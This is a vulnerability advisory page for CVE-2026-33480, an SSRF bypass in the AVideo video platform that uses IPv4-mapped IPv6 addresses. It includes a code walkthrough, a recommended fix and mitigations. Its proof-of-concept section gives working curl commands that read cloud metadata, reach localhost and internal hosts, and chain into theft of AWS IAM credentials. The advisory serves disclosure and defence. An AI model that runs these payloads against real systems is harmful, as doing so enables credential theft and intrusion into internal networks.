Skip to main content

PHP CVE-2026-33480

HIGH
Server-Side Request Forgery (SSRF) (CWE-918)
2026-03-20 https://github.com/WWBN/AVideo GHSA-p3gr-g84w-g8hh
8.6
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.6 HIGH
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
None
Availability
None

Lifecycle Timeline

2
Analysis Generated
Mar 20, 2026 - 20:46 vuln.today
CVE Published
Mar 20, 2026 - 20:44 nvd
HIGH 8.6

DescriptionGitHub Advisory

Summary

The isSSRFSafeURL() function in AVideo can be bypassed using IPv4-mapped IPv6 addresses (::ffff:x.x.x.x). The unauthenticated plugin/LiveLinks/proxy.php endpoint uses this function to validate URLs before fetching them with curl, but the IPv4-mapped IPv6 prefix passes all checks, allowing an attacker to access cloud metadata services, internal networks, and localhost services.

Details

The isSSRFSafeURL() function in objects/functions.php (lines 4021-4169) implements SSRF protection with two separate check paths:

  1. IPv4 checks (lines 4101-4134): Regex patterns matching dotted-decimal notation (/^10\./, /^172\./, /^192\.168\./, /^127\./, /^169\.254\./)
  2. IPv6 checks (lines 4150-4166): Checks for ::1, fe80::/10 (link-local), and fc00::/7 (unique local)

The gap: IPv4-mapped IPv6 addresses (::ffff:0:0/96) are not checked in either path. When a URL like http://[::ffff:169.254.169.254]/ is provided:

// Line 4038: parse_url strips brackets from IPv6 host
$host = parse_url($url, PHP_URL_HOST);
// $host = "::ffff:169.254.169.254"

// Line 4079: filter_var recognizes it as valid IPv6, skips DNS resolution
if (!filter_var($host, FILTER_VALIDATE_IP)) {
    $resolvedIP = gethostbyname($host);  // SKIPPED
}
$ip = $host;  // $ip = "::ffff:169.254.169.254"

// Lines 4101-4134: IPv4 regex checks DON'T match (not dotted-decimal)
if (preg_match('/^169\.254\.\d{1,3}\.\d{1,3}$/', $ip))  // NO MATCH

// Lines 4150-4166: IPv6 checks don't cover ::ffff: prefix
if ($ip === '::1' || ...)                    // NO MATCH
if (preg_match('/^fe[89ab][0-9a-f]:/i', $ip))  // NO MATCH
if (preg_match('/^f[cd][0-9a-f]{2}:/i', $ip))  // NO MATCH

// Line 4168: returns TRUE - bypass complete
return true;

The vulnerable endpoint plugin/LiveLinks/proxy.php explicitly disables authentication:

php
// proxy.php lines 2-3
$doNotConnectDatabaseIncludeConfig = 1;
$doNotStartSessionbaseIncludeConfig = 1;

After the bypass, two requests are made to the attacker-controlled URL:

  1. get_headers() at line 40 (via stream context)
  2. fakeBrowser() at line 63 (via curl) - response content is echoed back to the attacker (lines 69-80)

PoC

Read AWS instance metadata (IAM credentials):

bash
curl -s 'https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:169.254.169.254]/latest/meta-data/'

Access localhost services:

bash
curl -s 'https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:127.0.0.1]:3306/'

Scan internal network:

bash
curl -s 'https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:10.0.0.1]/'

Steal AWS IAM role credentials (full chain):

bash
# Step 1: Get IAM role name
ROLE=$(curl -s 'https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:169.254.169.254]/latest/meta-data/iam/security-credentials/')
# Step 2: Get temporary credentials for the role
curl -s "https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:169.254.169.254]/latest/meta-data/iam/security-credentials/${ROLE}"

Impact

  • Cloud credential theft: Unauthenticated attackers can read cloud instance metadata (AWS IMDSv1, GCP, Azure) to steal IAM credentials, potentially gaining full access to cloud infrastructure.
  • Internal network access: Attackers can scan and access internal services not exposed to the internet, including databases, admin panels, and other backend services.
  • Localhost service access: Attackers can interact with services bound to localhost (e.g., Redis, Memcached, internal APIs).
  • No authentication required: The endpoint explicitly disables session handling and database connections, making this exploitable by any anonymous internet user.

Recommended Fix

Replace the manual IPv4/IPv6 blocklist approach with PHP's built-in FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE flags, which correctly handle all private/reserved ranges including IPv4-mapped IPv6 addresses:

php
// In isSSRFSafeURL(), replace lines 4099-4166 with:

// Block all private and reserved IP ranges (handles IPv4, IPv6, and IPv4-mapped IPv6)
if (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
    _error_log("isSSRFSafeURL: blocked private/reserved IP: {$ip}");
    return false;
}

This single check replaces all the manual regex patterns and correctly handles:

  • All RFC 1918 private ranges (10/8, 172.16/12, 192.168/16)
  • Loopback (127/8, ::1)
  • Link-local (169.254/16, fe80::/10)
  • Unique local (fc00::/7)
  • IPv4-mapped IPv6 (::ffff:0:0/96) - the bypass vector in this finding
  • Other reserved ranges (0/8, 100.64/10 CGN, etc.)

AnalysisAI

AVideo, an open-source video platform, contains a server-side request forgery (SSRF) vulnerability that allows unauthenticated attackers to bypass URL validation using IPv4-mapped IPv6 addresses (::ffff:x.x.x.x format). The vulnerable endpoint plugin/LiveLinks/proxy.php can be exploited to access cloud metadata services (AWS, GCP, Azure), internal networks, and localhost services without authentication. A detailed proof-of-concept is publicly available demonstrating credential theft from AWS instance metadata, making this a critical risk for cloud-hosted installations.

Technical ContextAI

The vulnerability affects the AVideo platform (pkg:composer/wwbn_avideo) and stems from CWE-918 (Server-Side Request Forgery). The isSSRFSafeURL() function in objects/functions.php implements SSRF protection through separate validation paths for IPv4 (using regex patterns for dotted-decimal notation) and IPv6 (checking for ::1, fe80::/10, and fc00::/7). However, this blocklist approach fails to validate IPv4-mapped IPv6 addresses (::ffff:0:0/96 range). When parse_url() extracts the host and filter_var() recognizes it as valid IPv6, the address bypasses both IPv4 regex checks (which require dotted-decimal format) and IPv6 checks (which don't include the ::ffff: prefix). The proxy.php endpoint explicitly disables authentication mechanisms ($doNotConnectDatabaseIncludeConfig and $doNotStartSessionbaseIncludeConfig), allowing anonymous exploitation. The endpoint makes two requests using get_headers() and fakeBrowser() (curl), with responses echoed back to the attacker.

RemediationAI

Apply patches available through the GitHub security advisory at https://github.com/WWBN/AVideo/security/advisories/GHSA-p3gr-g84w-g8hh. The recommended fix replaces the manual blocklist approach with PHP's built-in filter_var() using FILTER_FLAG_NO_PRIV_RANGE and FILTER_FLAG_NO_RES_RANGE flags, which correctly handle IPv4-mapped IPv6 addresses along with all private and reserved IP ranges. Until patching is complete, implement immediate mitigations: disable the LiveLinks plugin if not required, implement web application firewall (WAF) rules to block requests to plugin/LiveLinks/proxy.php, restrict outbound network connections from the AVideo server to prevent metadata service access (block 169.254.169.254 and similar ranges at the network level), and for cloud deployments, upgrade to IMDSv2 (AWS) or equivalent metadata service protections that require additional headers. Monitor access logs for requests containing IPv6 bracket notation with ::ffff: prefixes as indicators of exploitation attempts.

More in PHP

View all
CVE-2012-1823 CRITICAL POC
9.8 May 11

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not

CVE-2016-1555 CRITICAL POC
9.8 Apr 21

(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear

CVE-2024-11680 CRITICAL POC
9.8 Nov 26

ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C

CVE-2025-49113 CRITICAL POC
9.9 Jun 02

Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au

CVE-2017-9841 CRITICAL POC
9.8 Jun 27

Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c

CVE-2025-0108 HIGH POC
8.8 Feb 12

Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers

CVE-2021-25298 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2021-25296 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2013-4983 CRITICAL POC
10.0 Sep 10

The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows

CVE-2023-6553 CRITICAL POC
9.8 Dec 15

The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1

CVE-2024-46506 CRITICAL POC
10.0 May 13

NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro

CVE-2024-8353 CRITICAL POC
9.8 Sep 28

The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all

Share

CVE-2026-33480 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy